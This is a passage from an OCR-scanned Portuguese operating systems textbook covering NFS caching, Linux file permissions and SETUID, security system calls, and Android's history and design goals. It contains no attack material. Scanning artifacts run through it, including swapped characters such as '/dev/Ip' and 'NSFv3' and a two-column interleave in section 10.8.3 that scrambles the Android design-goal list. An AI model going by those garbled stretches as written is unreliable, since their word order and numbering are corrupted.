blocos de 8 KB aqui. Se uma chamada de sistema write 
fornece menos de 8 KB de dados, os dados são apenas 
acumulados localmente. Apenas quando o bloco de 8 KB 
inteiro está cheio que ele é enviado para o servidor. No 
entanto, quando um arquivo é fechado, todos os seus da- 
dos são enviados para o servidor imediatamente. 

Outra técnica usada para melhorar o desempenho é o 
armazenamento em cache, como no UNIX comum. Ser- 
vidores armazenam dados em cache para evitar acessos 
de disco, mas isso é invisível para os clientes. Clientes 
mantêm duas caches, uma para atributos de arquivos (i- 
-nodos) e uma para dados de arquivos. Quando um i- 
-nodo ou um bloco de arquivo é necessário, é feita uma 
verificação para ver se ele pode ser satisfeito fora da ca- 
che. Se afirmativo, um tráfego de rede pode ser evitado. 

Embora a cache de cliente ajude o desempenho 
enormemente, ela também introduz alguns sérios pro- 
blemas. Suponha que dois clientes estejam armazenan- 
do em cache o mesmo bloco de arquivos e um deles o 
modifica. Quando o outro lê o bloco, ele recebe o valor 
velho (passado). A cache não é coerente. 

Dada a severidade potencial desse problema, a im- 
plementação do NFS toma várias medidas para mitigá- 
-lo. Primeiro, associado com cada bloco de cache há um 
temporizador. Quando o temporizador expira, a entrada 
é descartada. Em geral, o temporizador é colocado para 
3 s para blocos de dados e 30 s para blocos de diretório. 
Isso reduz de certa maneira o risco. Além disso, sempre 
que um arquivo em cache é aberto, é enviada uma men- 
sagem para o servidor para descobrir quando o arquivo 
foi modificado pela última vez. Se a última modificação 
ocorreu após a cópia local ter sido armazenada em cache, 
a cópia da cache é descartada e uma nova cópia é buscada 
do servidor. Por fim, a cada 30 s um temporizador de ca- 
che expira, e todos os blocos sujos (isto é, modificados) 
na cache são enviados para o servidor. Embora não sejam 
perfeitos, esses remendos tornam o sistema altamente uti- 
lizável na maior parte das circunstâncias. 


NFS versão 4 


A versão 4 do NFS foi projetada para simplificar de- 
terminadas operações do seu predecessor. Em compara- 
ção com o NSFv3, que foi descrito há pouco, o NFSv4 


é um sistema de arquivos com estado. Isso permite que 
operações open sejam invocadas em arquivos remotos, 
tendo em vista que o servidor NFS remoto manterá to- 
das as estruturas relacionadas ao sistema de arquivos, 
incluindo o ponteiro de arquivos. Operações de leitura 
então não precisam incluir faixas de leitura absoluta, mas 
podem ser aplicadas de maneira incremental a partir da 
posição do ponteiro de arquivos. Isso resulta em men- 
sagens mais curtas, e também na capacidade de reunir 
múltiplas operações NFSv3 em uma transação de rede. 

A natureza com estado do NFSv4 facilita integrar a 
variedade de protocolos NFSv3 descritos anteriormente 
nesta seção em um protocolo coerente. Não há necessida- 
de de dar suporte a protocolos diferentes para montagem, 
armazenamento em cache, travamento, ou operações 
seguras. NFSv4 também funciona melhor tanto com o 
Linux (e UNIX em geral) quanto com a semântica de sis- 
tema de arquivos Windows. 


10.7 Segurança no Linux 


O Linux, como um clone do MINIX e UNIX, tem 
sido um sistema multiusuário quase desde o seu princi- 
pio. Essa história significa que a segurança e o controle 
da informação foram inseridas desde o seu começo. Nas 
seções a seguir, examinaremos alguns aspectos de segu- 
rança do Linux. 


10.7.1 Conceitos fundamentais 


A comunidade de usuários para um sistema Linux 
consiste em uma série de usuários registrados, cada um 
deles com um UID único (ID de usuário). Um UID é 
um inteiro entre O e 65.535. Arquivos (e também pro- 
cessos e outros recursos) são marcados com o UID do 
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seu proprietário. Por padrão, o proprietário de um arqui- 
vo é a pessoa que o criou, embora exista uma maneira 
de trocar a propriedade. 

Usuários podem ser organizados em grupos, que 
também são numerados com inteiros de 16 bits chama- 
dos de GIDs (IDs de grupos). A designação de usuários 
para grupos é realizada manualmente (através do admi- 
nistrador do sistema) e consiste em realizar entradas 
em um banco de dados do sistema dizendo qual usuário 
está em qual grupo. Um usuário poderia estar em um ou 
mais grupos ao mesmo tempo. Para simplificar, não nos 
aprofundaremos nessa questão. 

O mecanismo de segurança básica no Linux é simples. 
Cada processo carrega o UID e GID do seu proprietário. 
Quando um arquivo é criado, ele recebe o UID e GID do 
processo criador. O arquivo também recebe um conjunto 
de permissões determinado pelo processo criador. Essas 
permissões especificam qual acesso o proprietário, os ou- 
tros membros do grupo do proprietário e o resto dos usu- 
ários têm em relação ao arquivo. Para cada uma dessas 
três categorias, acessos potenciais são read, write e exe- 
cute, designados pelas letras r, w e x, respectivamente. A 
capacidade de executar um arquivo faz sentido somente 
se aquele arquivo for um programa binário executável, 
é claro. Uma tentativa de executar um arquivo que tem 
a permissão de execução, mas não é executável (isto é, 
não começa com um cabeçalho válido) fracassará com 
um erro. Como há três categorias de usuários e 3 bits por 
categoria, 9 bits é suficiente para representar os direitos 
de acesso. Alguns exemplos dos números de 9 bits e seus 
significados são dados na Figura 10.37. 

As primeiras duas entradas na Figura 10.37 permi- 
tem o acesso absoluto ao proprietário e ao grupo do 
proprietário, respectivamente. A entrada seguinte per- 
mite que o grupo do proprietário leia o arquivo, mas 
não o modifique, e evite o acesso de pessoas de fora. 
A quarta entrada é comum para um arquivo de dados 
































Alguns exemplos de modos de proteção de arquivos. 
Binário Simbólico Acessos permitidos ao arquivo 
111000000 | rwx------ O proprietário pode ler, escrever e executar 
111111000 | rwxrwx--- O proprietário e o grupo podem ler, escrever e executar 
110100000 | rw-r----- O proprietário pode ler e escrever; o grupo pode ler 
110100100 | rw-r--r-- O proprietário pode ler e escrever; todos os outros podem ler 
111101101 | rwxr-xr-x O proprietario pode fazer qualquer coisa; os demais podem ler e executar 
000000000 | --------- Ninguém tem nenhum tipo de acesso 
000000111 | ------ rwx Somente usuários de fora têm acesso (estranho, mas possível) 
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que o proprietário quer tornar público. De modo similar, 
a quinta entrada é a usual para um programa disponí- 
vel publicamente. A sexta entrada nega todo o acesso 
a todos os usuários. Esse modo é às vezes usado para 
arquivos falsos usados para exclusão mútua porque 
uma tentativa de criar um arquivo desses fracassará se 
já existir um. O último exemplo é realmente estranho, 
considerando que ele dá ao resto do mundo mais aces- 
so do que ao proprietário. No entanto, a sua existência 
é consequência das regras de proteção. Felizmente, há 
uma maneira para o proprietário subsequentemente mu- 
dar o modo de proteção, mesmo sem ter qualquer acesso 
ao próprio arquivo. 

O usuário com UID 0 é especial e é chamado de su- 
perusuário (ou root). O superusuário tem o poder de 
ler e escrever todos os arquivos no sistema, não importa 
quem seja o seu proprietário e não importa como eles 
são protegidos. Processos com UID 0 também têm a ca- 
pacidade de realizar um pequeno número de chamadas 
de sistema que são negadas para os usuários comuns. 
Em geral, apenas o administrador do sistema conhece a 
senha do superusuário, embora muitos estudantes con- 
siderem um belo esporte tentar procurar por falhas no 
sistema de maneira que eles possam conectar-se como o 
superusuário sem conhecer a senha. Os administradores 
buscam repreender esse tipo de atividade. 

Diretórios são arquivos e têm os mesmos modos de 
proteção que os arquivos comuns, exceto que os bits 
x referem-se à permissão de busca em vez da permis- 
são de execução. Desse modo, um diretório com modo 
rwxr-xr-x permite que o seu proprietário leia, modifi- 
que e pesquise o diretório, mas permite que os outros 
apenas leiam e o pesquisem, mas não acrescentem ou 
removam arquivos dele. 

Arquivos especiais correspondendo aos dispositivos de 
E/S têm os mesmos bits de proteção que os arquivos regu- 
lares. Esse mecanismo pode ser usado para limitar o acesso 
a dispositivos de E/S. Por exemplo, o arquivo especial da 
impressora, /dev/lp, poderia ser de propriedade do root ou 
de um usuário especial, daemon, e ter modo rw- — — — — 
— — para evitar que todos os outros acessem diretamente a 
impressora. Afinal de contas, se todos pudessem imprimir 
conforme sua vontade, resultaria no caos. 

É claro, ter /dev/Ip em mãos de, digamos, o daemon 
com modo de proteção rw- — — — — — — significa que 
ninguém mais pode usar a impressora. Embora isso 
poupe muitas árvores inocentes de uma morte precoce, 
às vezes os usuários têm uma necessidade legítima de 
imprimir algo. Na realidade, há um problema mais geral 
de permitir o acesso controlado a todos os dispositivos 
de E/S e a outros recursos do sistema. 


Esse problema foi solucionado acrescentando um 
novo bit de proteção, o bit SETUID, aos 9 bits de 
proteção discutidos. Quando um programa com o 
bit SETUID é executado, o UID efetivo para aquele 
processo torna-se o UID do proprietário do arquivo 
executável, em vez do UID do usuário que o invocou. 
Quando um processo tenta abrir um arquivo, é o UID 
efetivo que é conferido, não o UID real subjacente. 
Ao fazer que o programa que acessa a impressora 
seja de propriedade do daemon mas com o SETUID 
bit ativado, qualquer usuário poderia executá-lo e ter 
o poder do daemon (por exemplo, acesso a /dev/Ip), 
mas apenas para executar aquele programa (que po- 
deria colocar na fila trabalhos de impressão para im- 
primir de uma maneira ordeira). 

Muitos programas Linux sensíveis são de proprieda- 
de do root, mas com o bit SETUID ativado. Por exem- 
plo, o programa que permite aos usuários modificarem 
suas senhas, passwd, precisa escrever no arquivo de se- 
nhas. Tornar o arquivo de senhas publicamente passível 
de ser escrito não seria uma boa ideia. Em vez disso, há 
um programa que é de propriedade do root e que tem 
o bit SETUID. Embora o programa tenha acesso com- 
pleto ao arquivo de senha, ele mudará somente a senha 
do chamador e não permitirá qualquer outro acesso ao 
arquivo de senhas. 

Além do bit SETUID há também um bit SETGID 
que funciona de maneira análoga, temporariamente 
dando ao usuário o GID efetivo do programa. Na práti- 
ca, isso raramente é usado, no entanto. 


10.7.2 Chamadas de sistema para segurança no 
Linux 


Há um pequeno número de chamadas de sistema 
relacionadas à segurança. As mais importantes estão 
listadas na Figura 10.38. A chamada de sistema de se- 
gurança mais usada é chmod. Ela é usada para mudar o 
modo de proteção. Por exemplo, 


s = chmod(“/usr/ast/'newgame”, 0755); 


estabelece newgame para rwxr—xr—x de maneira que to- 
dos possam executá-la (observe que 0755 é uma cons- 
tante octal, o que é conveniente, tendo em vista que os 
bits de proteção vêm em grupos de 3 bits). Apenas o 
proprietário de um arquivo e o superusuário podem mu- 
dar os seus bits de proteção. 

A chamada access testa para ver se um determinado 
acesso usando o UID real e o GID seria permitido. Essa 
chamada de sistema é necessária para evitar brechas de 
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eii TEE: Algumas chamadas do sistema relacionadas a segurança. O código de retorno s é -1 caso ocorra um erro; uid e gid são 
o UID e o GID, respectivamente. Os parâmetros são autoexplicativos. 





Chamada de sistema 


Descrição 





s = chmod(caminho, modo) 


Troca o modo de proteção do arquivo 





s = access(caminho, modo) 


Verifica acesso usando o UID e GID reais 





























segurança nos programas que são SETUID e de proprie- 
dade do root. Um programa desses pode fazer qualquer 
coisa, € às vezes isso é necessário para o programa des- 
cobrir se o usuário tem permissão para realizar um de- 
terminado acesso. O programa não pode simplesmente 
tentá-lo, pois o acesso sempre será bem-sucedido. Com 
a chamada access o programa pode descobrir se o aces- 
so é deixado pelo UID real e GID real. 

As próximas quatro chamadas de sistema retornam 
os UIDs e GIDs real e efetivo. As últimas três são per- 
mitidas somente para o superusuário — elas trocam o 
proprietário do arquivo, o UID e o GID do processo. 


10.7.3 Implementação da segurança no Linux 


Quando um usuário se conecta, o programa de lo- 
gin, login (que tem SETUID de root) pede um nome de 
login e uma senha. Ele gera um resumo criptográfico 
da senha e então procura no arquivo de senha, /etc/ 
passwd, para ver se o resumo casa com o que está ali 
(sistemas em rede funcionam de maneira ligeiramente 
diferente). A razão para se usar resumos é evitar que a 
senha seja armazenada de uma maneira não criptogra- 
fada em qualquer parte no sistema. Se a senha estiver 
correta, o programa de login procura em /etc/passwd 
para ver o nome do shell preferido do usuário, possi- 
velmente bash, mas possivelmente algum outro shell, 
como csh ou ksh. O programa de login então usa setuid 
e setgid para dar a si mesmo o UID e GID do usuário 
(lembre-se, ele começou como um SETUID root). En- 
tão ele abre o teclado para a entrada padrão (descri- 
tor de arquivo 0), a tela para a saída padrão (descritor 
de arquivo 1) e a tela para o erro padrão (descritor de 


uid = getuid() Obtém o UID real 

uid = geteuid( ) Obtém o UID efetivo 

gid = getgid( ) Obtém o GID real 

gid = getegid() Obtém o GID efetivo 

s = chown(caminho, proprietario, grupo) Troca proprietário e grupo 
s = setuid(uid) Configura o UID 

s = setgid(gid) Configura o GID 








arquivo 2). Por fim, ele executa o shell preferido, des- 
se modo terminando a si mesmo. 

Nesse ponto, o shell preferido está executando com 
o UID e GID corretos, e entrada padrão, saída e erro, to- 
dos configurados para seus dispositivos padrão. Todos 
os processos que ele cria (isto é, comandos digitados 
pelo usuário) automaticamente herdam o UID e GID do 
shell, de maneira que eles também terão o proprietário 
e o grupo corretos. Todos os arquivos que eles criam 
também recebem esses valores. 

Quando qualquer processo tenta abrir um arquivo, o 
sistema primeiro confere os bits de proteção no i-nodo 
do arquivo com o UID e GID efetivos do chamador para 
ver se o acesso é permitido. Se afirmativo, o arquivo é 
aberto e o descritor de arquivos retornado. Se não, o 
arquivo não é aberto e —1 é retornado. Nenhuma verifi- 
cação é feita em chamadas read ou write subsequentes. 
Como consequência, se o modo de proteção muda após 
um arquivo já estar aberto, o modo novo não afetará 
processos que já têm o arquivo aberto. 

O modelo de segurança Linux e sua implementação 
são essencialmente os mesmos que na maioria dos sis- 
temas UNIX tradicionais. 


10.8 Android 


O Android é um sistema operacional relativamente 
novo projetado para executar em dispositivos móveis. 
Ele é baseado no núcleo Linux — o Android introduz 
apenas alguns conceitos novos para o próprio núcleo 
do Linux, usando a maioria dos mecanismos do Linux 
com que você que já está familiarizado (processos, 
IDs de usuário, memória virtual, sistemas de arquivos, 
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escalonamento etc.), às vezes de maneiras bem diferen- 
tes do que eles foram originalmente pensados. 

Nos cinco anos desde a sua introdução, o Android 
cresceu para ser um dos sistemas operacionais de 
smartphones mais amplamente usados. Sua populari- 
dade alavancou a explosão de smartphones, e ele está 
livremente disponível para fabricantes de dispositivos 
móveis usarem em seus produtos. Ele também é uma 
plataforma de código aberto, tornando-o customizá- 
vel para uma série de dispositivos. Ele é popular não 
só para dispositivos centrados no consumidor onde 
seu ecossistema de aplicações de terceiros é vantajoso 
(como tablets, televisões, sistemas de jogos e tocadores 
de mídia), mas é cada vez mais usado como o SO embu- 
tido para dispositivos dedicados que precisam de uma 
interface gráfica de usuário — GUI — como telefo- 
nes VOIP, relógios inteligentes, painéis de automóveis, 
dispositivos médicos e utensílios domésticos. 

Uma parte significativa do sistema operacional An- 
droid é escrita em uma linguagem de alto nível, a lin- 
guagem de programação Java. O núcleo e um grande 
número de bibliotecas de baixo nível são escritos em C 
e C++. No entanto, uma grande parte do sistema é escri- 
ta em Java e, com algumas poucas exceções, toda a API 
para aplicações é escrita e publicada em Java também. 
As partes do Android escritas em Java tendem a seguir 
um projeto bastante orientado a objetos como encoraja- 
do por aquela linguagem. 


10.8.1 Android e Google 


O Android é um sistema operacional pouco comum 
no sentido de que ele combina código aberto com apli- 
cações de terceiros de código fechado. A parte de códi- 
go aberto do Android é chamada de AOSP (Android 
Open Source Project — Projeto de código aberto do 
Android) e é completamente aberta e livre para ser usa- 
da e modificada por qualquer um. 

Uma meta importante do Android é dar suporte a 
um ambiente rico de aplicação de terceiros, que exige 
ter uma implementação e API estáveis para aplicações 
executarem sobre. No entanto, em um mundo de código 
aberto onde cada fabricante de um dispositivo pode cus- 
tomizar a plataforma do jeito que ele quiser, logo sur- 
gem questões de compatibilidade. Tem de haver alguma 
maneira de controlar esse conflito. 

Parte da solução para isso para o Android é o CDD 
(Compatibility Definition Document — Documento 
de definição de compatibilidade), que descreve as ma- 
neiras como o Android deve se comportar para ser com- 
patível com aplicações de terceiros. Esse documento em 


si descreve o que é exigido para ser um dispositivo An- 
droid compatível. Sem alguma maneira de forçar essa 
compatibilidade, no entanto, ele muitas vezes será igno- 
rado; é preciso que exista algum mecanismo adicional 
para fazer isso. 

O Android soluciona essa questão ao permitir que 
serviços proprietários adicionais sejam criados sobre a 
plataforma de código aberto, fornecendo serviços (em 
geral baseados na nuvem) que a plataforma não possa 
implementar sozinha. Como esses serviços têm proprie- 
tário, eles podem restringir quais dispositivos podem 
ser incluídos, desse modo exigindo compatibilidade 
CDD desses dispositivos. 

O Google implementou o Android para poder dar 
suporte a uma ampla gama de serviços de nuvem pro- 
prietários, com a ampla gama de serviços do Google 
sendo os casos representativos: Gmail, sincronização 
de calendário e contatos, mensagens da nuvem para o 
dispositivo e muitos outros serviços, alguns visíveis 
para o usuário, alguns não. Quanto à oferta de aplicati- 
vos compatíveis, o serviço mais importante é o Google 
Play. 

O Google Play é a loja on-line do Google para apli- 
cativos Android. Em geral, quando os projetistas criam 
as aplicações do Android, eles as publicarão com o 
Google Play. Como o Google Play (ou qualquer outra 
loja de aplicativos) é o canal pelo qual os aplicativos 
são entregues para um dispositivo Android, esse servi- 
ço proprietário é responsável por assegurar que os apli- 
cativos funcionarão nos dispositivos para os quais eles 
foram entregues. 

O Google Play usa dois mecanismos principais para 
assegurar a compatibilidade. O primeiro e mais impor- 
tante é exigir que qualquer dispositivo enviado com ele 
deve ser um dispositivo Android compatível de acordo 
com o CDD. Isso assegura um mínimo de comporta- 
mento através de todos os dispositivos. Além disso, o 
Google Play deve saber a respeito de quaisquer carac- 
terísticas de um dispositivo que um aplicativo exige 
(como a presença de um GPS para realizar a navega- 
ção por mapeamento), de maneira que a aplicação não 
seja disponibilizada em dispositivos que não têm essas 
características. 


10.8.2 História do Android 


O Google desenvolveu o Android em meados dos 
anos 2000, após adquirir a empresa Android no início 
do seu desenvolvimento. Quase todo o desenvolvimen- 
to da plataforma Android que existe hoje foi feito sob a 
administração do Google. 


Desenvolvimento inicial 


A Android Inc. era uma empresa de software fun- 
dada para construir um software para criar dispositivos 
móveis mais inteligentes. De início, voltada para as ca- 
meras, a visão logo mudou para os smartphones graças 
ao seu mercado potencial maior. Aquela meta inicial 
cresceu para abordar a dificuldade que existia à época 
no desenvolvimento de dispositivos móveis, trazendo 
para eles uma plataforma aberta construída sobre o Li- 
nux e que pudesse ser amplamente usada. 

Durante essa época, os protótipos para a interface 
do usuário da plataforma eram implementadas para de- 
monstrar as ideias por trás deles. A plataforma em si 
estava buscando atingir três linguagens fundamentais, 
JavaScript, Java e C++, a fim de dar suporte a um rico 
ambiente de desenvolvimento de aplicativos. 

O Google adquiriu o Android em julho de 2005, for- 
necendo os recursos necessários e o suporte de serviço 
na nuvem para continuar o desenvolvimento do An- 
droid como um produto completo. Um grupo relativa- 
mente pequeno de engenheiros trabalhou junto durante 
essa época, começando a desenvolver a infraestrutura 
principal da plataforma e as fundações para o desenvol- 
vimento da aplicação de nível mais elevado. 

No início de 2006, foi feita uma mudança significa- 
tiva no plano: em vez de dar suporte a múltiplas lingua- 
gens de programação, a plataforma focaria inteiramente 
na linguagem de programação Java para o desenvol- 
vimento de aplicativos. Essa era uma mudança difícil, 
uma vez que a abordagem de múltiplas linguagens man- 
tinha todos superficialmente felizes com o “melhor de 
todos os mundos”; concentrar-se em uma linguagem pa- 
recia um passo atrás para os engenheiros que preferiam 
outras linguagens. 

Tentar deixar todos felizes, no entanto, pode facil- 
mente não deixar ninguém feliz. Construir três conjun- 
tos diferentes de APIs de linguagem teria exigido muito 
mais esforço do que concentrar-se em uma única lingua- 
gem, reduzindo muito a qualidade de cada uma. A deci- 
são de concentrar-se na linguagem Java foi crítica para 
a qualidade final da plataforma e o desenvolvimento da 
capacidade da equipe de atender importantes prazos. 

À medida que o desenvolvimento foi progredindo, 
a plataforma Android foi desenvolvida de perto com 
os aplicativos que em última análise seguiriam sobre 
ela. O Google já tinha uma ampla gama de serviços 
— incluindo Gmail, Mapas, Calendário, YouTube e, 
é claro, Busca — que seriam entregues sobre o An- 
droid. O conhecimento ganho a partir da implemen- 
tação desses aplicativos sobre a plataforma inicial foi 
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alimentado de volta para o seu projeto. Esse processo 
iterativo com os aplicativos permitiu muitas falhas de 
projeto na plataforma serem resolvidas no início do 
seu desenvolvimento. 

A maior parte do desenvolvimento dos primeiros 
aplicativos foi feita com pouco da plataforma subjacen- 
te disponível de fato para os projetistas. A plataforma 
em geral executava inteiramente dentro de um processo, 
através de um “simulador” que executava todo o siste- 
ma e aplicações como um único processo em um com- 
putador hospedeiro. Na realidade, ainda existem alguns 
resquícios dessa antiga implementação por aí hoje em 
dia, com coisas como o método Application.onTermina- 
te ainda no SDK (Software Development Kit — Kit de 
desenvolvimento de software), que os programadores 
Android usavam para escrever aplicações. 

Em junho de 2006, dois dispositivos de hardware fo- 
ram selecionados como alvos para o desenvolvimento 
de software para produtos planejados. O primeiro, com 
o codinome “Sooner”, era baseado em um smartphone 
existente com um teclado QWERTY e tela sem entrada 
de toque. A meta desse dispositivo era lançar um primei- 
ro produto o mais cedo possível, alavancando hardwares 
existentes. O segundo dispositivo-alvo, com o codinome 
“Dream”, era projetado especificamente para o Android, 
para ser executado exatamente como fora imaginado. Ele 
incluía uma tela de toque grande (para a época), teclado 
QWERTY slide-out, rádio 3G (para navegação rápida na 
web), acelerômetro, GPS e compasso (para dar suporte 
aos Mapas do Google) etc. 

À medida que o cronograma dos softwares foi fi- 
cando mais claro, tornou-se evidente que os dois cro- 
nogramas dos hardwares não faziam sentido. Quando 
fosse possível lançar o Sooner, aquele hardware esta- 
ria bastante defasado, e o esforço de colocar o Sooner 
no mercado estava impedindo o avanço do dispositivo 
Dream mais importante. Para lidar com essa questão, 
ficou decidido que eles desistiriam do Sooner como um 
dispositivo-meta (embora o desenvolvimento naquele 
hardware tenha continuado por algum tempo até que o 
hardware mais novo estivesse pronto) e se concentra- 
riam inteiramente no Dream. 


Android 1.0 


A primeira disponibilização pública da platafor- 
ma Android foi uma pré-estreia do SDK lançado em 
novembro de 2007. Ele consistia de um emulador de 
dispositivo de hardware executando um sistema de dis- 
positivo Android completo em termos de aplicativos de 
imagem e núcleo, documentação API e um ambiente de 


558 | | SISTEMAS OPERACIONAIS MODERNOS 


desenvolvimento. A essa altura o projeto e implemen- 
tação do núcleo já estavam no lugar e como um todo 
lembrava de perto a arquitetura do sistema Android mo- 
derno que estaremos discutindo. O anúncio incluiu de- 
monstrações de vídeo da plataforma executando sobre 
os hardwares Sooner e Dream. 

O primeiro desenvolvimento do Android havia sido 
feito sob uma série de conquistas trimestrais que eram 
demonstradas para impulsionar e mostrar o processo 
contínuo. Ele exigia pegar todos os fragmentos que ha- 
viam sido reunidos até o momento para o desenvolvi- 
mento do aplicativo, limpá-los, documentá-los e criar 
um ambiente de desenvolvimento coeso para projetistas 
terceiros. 

O desenvolvimento procedia agora ao longo de 
duas linhas: aproveitar o feedback a respeito do SDK 
para refinar e finalizar mais ainda as APIs, e terminar 
e estabilizar a implementação necessária para lançar o 
dispositivo Dream. Uma série de atualizações públicas 
ao SDK ocorreu nessa época, culminando em um lan- 
çamento 0.9 em agosto de 2008, que continha as APIs 
praticamente finais. 

A plataforma em si estivera passando por um desen- 
volvimento rápido e, na primavera de 2008, o foco foi 
mudando para a estabilização de maneira que o Dream 
pudesse ser lançado. O Android a essa altura continha 
uma grande quantidade de código que nunca havia sido 
lançada como um produto comercial, desde partes da 
biblioteca C, passando pelo interpretador Dalvik (que 
executa os aplicativos), sistema e aplicativos. 

O Android também continha algumas ideias de de- 
sign inovadoras que nunca haviam sido colocadas em 
prática, e não estava claro ainda como elas se sairiam. 
Isso tudo precisava fechar como um produto estável, e a 
equipe passou alguns meses ansiosa perguntando-se se 
tudo sairia como planejado. 

Por fim, em agosto de 2008, o software estava está- 
vel e pronto para ser lançado. O projeto foi enviado para 
a fábrica e os dispositivos começaram a ser produzidos. 
Em setembro, o Android 1.0 foi lançado no dispositivo 
Dream, agora chamado de T-Mobile G1. 


Desenvolvimento contínuo 


Após o lançamento do Android 1.0, o desenvolvi- 
mento continuou em um ritmo rápido. Houve em torno 
de 15 atualizações importantes para a plataforma du- 
rante os 5 anos seguintes, acrescentando uma grande 
variedade de características e melhorias do lançamento 
do 1.0 inicial. 


O DCC original basicamente permitiu que fossem 
compatíveis apenas dispositivos muito parecidos com o 
T-Mobile G1. Nos anos seguintes, a gama de dispositi- 
vos compatíveis se expandiria muito. Pontos fundamen- 
tais desse processo foram: 


1. Durante 2009, as versões 1.5 até 2.0 do Android 
introduziram um teclado suave que removeu a 
exigência de um teclado físico, suporte para telas 
muito mais amplo (tanto em tamanho quanto em 
quantidade de pixels) para dispositivos QVGA 
lower-end e dispositivos maiores e de densida- 
de maior como o WVGA Motorola Droid, e um 
novo mecanismo de “característica de sistema” 
para os dispositivos relatarem quais característi- 
cas de hardware eles suportam e aplicativos para 
indicar quais características de hardware eles exi- 
gem. Esses aplicativos são o mecanismo funda- 
mental que o Google Play usa para determinar a 
compatibilidade de aplicativos com um dispositi- 
vo específico. 

2. Durante 2011, as versões 3.0 até 4.0 do Android 
introduziram um novo suporte de núcleo na pla- 
taforma para tablets de 10 polegadas e tablets 
maiores; a plataforma do núcleo agora suportava 
completamente tamanhos de telas de dispositi- 
vos desde telefones QVGA pequenos, passando 
por smartphones, “phablets” maiores, tablets 
de 7 polegadas e tablets maiores de mais de 10 
polegadas. 

3. À medida que a plataforma fornecia suporte em- 
butido para hardwares mais diversos, não apenas 
para as telas maiores, mas também dispositivos 
não de toque com ou sem mouse, muitos mais 
tipos de dispositivos Android apareceram. Entre 
eles, dispositivos de TV como o Google TV, dis- 
positivos de jogos, notebooks, câmeras etc. 


Um trabalho de desenvolvimento significativo foi 
feito também em algo não tão visível: uma separação 
mais limpa dos serviços de propriedade do Google da 
plataforma de código aberto do Android. 

Para o Android 1.0, foi investido um trabalho signifi- 
cativo para ter uma API de aplicativos de terceiros limpa e 
uma plataforma de código aberto sem depender de código 
proprietário do Google. No entanto, a implementação do 
código proprietário do Google não foi totalmente limpa, 
tendo dependência em partes internas da plataforma. Mui- 
tas vezes a plataforma não tinha nem mesmo funciona- 
lidades que o código proprietário do Google necessitava 
para integrar-se bem com ela. Uma série de projetos fo- 
ram logo levados adiante para abordar essas questões: 


1. Em 2009, a versão 2.0 do Android introduziu uma 


arquitetura para terceiros para conectarem seus 
próprios adaptadores de sincronia em APIs da 
plataforma como o banco de dados de contatos. 
O código do Google para sincronizar vários dados 
passou para esse API bem definido do SDK. 

. Em 2010, a versão 2.2 do Android incluiu traba- 
lho no design interno e implementação do código 
proprietário do Google. Esse “grande desembru- 
lho” implementou de maneira limpa muitos ser- 
viços do Google fundamentais, do fornecimento 
de atualizações de softwares do sistema baseados 
na nuvem, a “mensagens da nuvem para dispo- 
sitivo” e outros serviços de segundo plano, de 
maneira que eles pudessem ser entregues e atua- 
lizados separadamente da plataforma. 

. Em 2012, um novo aplicativo serviços Google 
Play foi entregue para os dispositivos, conten- 
do características novas e atualizadas para os 
serviços proprietários do Google não relativos a 
aplicativos. Este foi o resultado do trabalho de 
desembrulho de 2010, permitindo que APIs pro- 
prietárias como mensagens da nuvem para dispo- 
sitivo e mapas fossem inteiramente fornecidas e 
atualizadas pelo Google. 


10.8.3 Objetivos do projeto 
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equilibrado. O código aberto do Android é proje- 
tado para ser o mais neutro possível para as fun- 
cionalidades de nível mais elevado construídas 
sobre ele, do acesso a serviços de nuvem (como 
sincronia de dados ou APIs de mensagens da nu- 
vem para dispositivos), a bibliotecas (como a bi- 
blioteca de mapeamento do Google) e serviços 
ricos como lojas de aplicativos. 


. Fornecer um modelo de segurança do aplicativo 


no qual os usuários não têm de confiar profun- 
damente em aplicativos de terceiros. O sistema 
operacional deve proteger o usuário do mau 
comportamento de aplicativos, não somente 
aplicativos com defeitos que podem fazê-lo que- 
brar, mas o uso equivocado mais sutil do dispo- 
sitivo e os dados do usuário nele. Quanto menos 
os usuários precisarem confiar nos aplicativos, 
mais liberdade eles terão para experimentá-los e 
instalá-los. 

Suportar as interações típicas de usuário móveis: 
passar quantidades de tempo curtas em muitos 
aplicativos. A experiência móvel tende a envol- 
ver breves interações com os aplicativos: olhar 
de relance um e-mail recém-recebido, receber e 
enviar uma mensagem pelo SMS ou IM, ir aos 
contatos para fazer uma ligação etc. O sistema 
precisa otimizar para esses casos com tempos 
de troca e inicialização de aplicativos rápidos; a 
meta para o Android foi geralmente 200 ms para 


Uma série de objetivos fundamentais do pro- 
jeto da plataforma Android evoluiu durante o seu 
desenvolvimento: 6. 


partir do zero em um aplicativo básico até o pon- 
to de mostrar o UI interativo completo. 
Gerenciar processos de aplicativos para os usuá- 


1. Fornecer uma plataforma de código aberto com- rios, simplificando a experiência do usuário em 


pleta para dispositivos móveis. A parte de código 
aberto do Android é uma pilha de sistema ope- 
racional de baixo para cima (bottom-to-top), in- 
cluindo uma série de aplicativos, que podem ser 
fornecidos como um produto completo. 

. Forte suporte para aplicativos proprietários de 
terceiros com uma API estável e robusta. Como 
discutido anteriormente, trata-se de algo desa- 
fiador manter uma plataforma que seja ao mes- 
mo tempo verdadeiramente de código aberto e 
também estável o suficiente para aplicativos de 
propriedade de terceiros. O Android usa uma 
mistura de soluções técnicas (especificando um 
SDK muito bem definido e divisão entre APIs 
públicas e implementação interna) e exigências 
de política (através do CDD) para lidar com isso. 
. Permitir a todos os aplicativos de terceiros, in- 
cluindo os do Google, competir em um mercado 


torno de aplicativos de maneira que os usuários 
não tenham de preocupar-se em fechá-los quando 
terminaram com eles. Dispositivos móveis tam- 
bém tendem a executar sem o espaço de troca 
que permite que os sistemas operacionais falhem 
com mais elegância quando o conjunto atual de 
aplicativos executando exige mais RAM do que 
fisicamente disponível. Para lidar com ambas as 
exigências, o sistema precisa assumir uma postu- 
ra mais proativa a respeito do gerenciamento de 
processos e decidir quando eles devem ser inicia- 
lizados e parados. 


. Encorajar os aplicativos a cooperarem entre si e 


colaborarem de maneiras interessantes e seguras. 
Os aplicativos móveis são de certa maneira um 
retorno aos comandos de shell: em vez do proje- 
to monolítico cada vez maior dos aplicativos de 
computadores de grande porte, eles são focados 
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e buscam atender necessidades especificas. Para 
ajudar a dar suporte a isso, 0 sistema operacional 
deve fornecer novos tipos de mecanismos para 
esses aplicativos a fim de colaborarem entre si e 
criarem um todo maior. 

8. Criar um sistema operacional. Dispositivos mó- 
veis são uma expressão nova da computação de 
propósito geral, não algo mais simples do que 
nossos sistemas operacionais de desktops tradi- 
cionais. O projeto do Android deve ser rico o su- 
